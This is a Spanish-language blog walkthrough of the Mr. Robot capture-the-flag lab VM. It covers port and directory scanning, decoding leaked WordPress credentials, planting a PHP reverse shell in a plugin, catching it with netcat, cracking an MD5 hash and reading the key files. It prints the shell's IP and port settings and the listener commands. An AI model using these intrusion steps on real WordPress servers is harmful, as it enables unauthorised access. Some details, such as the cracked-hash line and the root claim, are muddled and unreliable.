Advertisement

header ads

MR ROBOT 1.0

CreadPag March 09, 2017
Bueno MR. ROBOT un CTF armado con muchas respuesta de una de las series en el cual no soy fans de esa serie pero nuestro objetivo es encontrar una key.

Estuve escaneando sus puertos y nos muestra el puerto 443, 80 abierto entonces mi idea fue que puede ser que este montado un servidor web. En el cual hice una búsqueda de directorio con DIRB y me arrojo un wordpress.

nmap -sV -sC 192.168.1.7
dirb http://192.168.1.7
No me quede tan feliz que le hice un escaneo con nikto 
nikto -h 192.168.1.7 -p 443
nikto -h 192.168.1.7
Pero con Nikto tuve mucha suerte.
Encontramos útil. 
http://192.168.1.7/robots.txt
Buscamos el directorio con el diccionario 
wfuzz -w /root/Downloads/fsocity.dic --sc=200 http://192.168.1.7/FUZZ
Ahora cuando encontramos "license" Vamos a decodificar esta codificación base64. 
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
Si tienes problemas en decodificar puedes hacer online. Pincha Aquí.
Ahora iniciamos sesión a wordpress y vamos a modificar o inyectar tu shell en un plugin.
 

Inyectamos nuestra shell por ejemplo en PLUGIN HELLO.php 
http://192.168.1.5/wp-content/plugins/hello.php
Sino sabes las ubicaciones puedes usar 
wpscan -u 192.168.1.5 --enumerate p
Ahora encontramos una KEY 
robot:c3fcd3d76192e4007dfb496cca67e13b
Desciframos MD5 
robot:c3fcd3d76192e4007dfb496cca67e13b
MD5 = abcdefghijklmnopqrstuvwxyz
Luego editamos un index.php para ejecutar nuestra php reverse. Y lo editamos y copiamos el siguiente código
  Modificamos esta parte del código 

$ip = '192.168.1.3';  // CHANGE THIS
$port = 6663;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = '/bin/sh -i';
$daemon = 0;
$debug = 0;
Y ejecutamos en la terminal 
nc -lvp 6663
Mientras que también abrimos la URL. Recuerda siempre el puerto para hacer el reverse. Luego corremos nuestro reverse a python 
python -c 'import pty;pty.spawn("/bin/bash");'
su robot
Ahora te pide la contraseña pero como anteriormente desciframos un MD5 robot:XXXX Listo, ingresamos en modo root 
cat key-2-of-3.txt
KEY : 822c73956184f694993bede3eb39f959
 LISTO CREADPAG he terminado el CTF. Espero haberte dado una idea. Recuerda hay cosas que puedes crearte.
Tags
Reactions

Post a Comment

1 Comments

  1. SandraJuly 13, 2020 12:39 am

    Gracias, señor, por tomarse el tiempo para compartir el conocimiento. Su forma de explicar el tema es bastante simple y comprensiva. Aquí hay un sitio web, me gustaría sugerir una herramienta para decodificar y codificar base64, esa herramienta es url-decode.com/tool / base64-decode . En realidad, ese enlace contiene las herramientas relacionadas con la decodificación y codificación (URL, base64), utilidades de números, convertidor de unidades, desarrolladores, utilidades de cadena, convertidor y herramientas de IP en un solo dominio. Por lo tanto, definitivamente te ayudará en tus proyectos futuros.

    ReplyDelete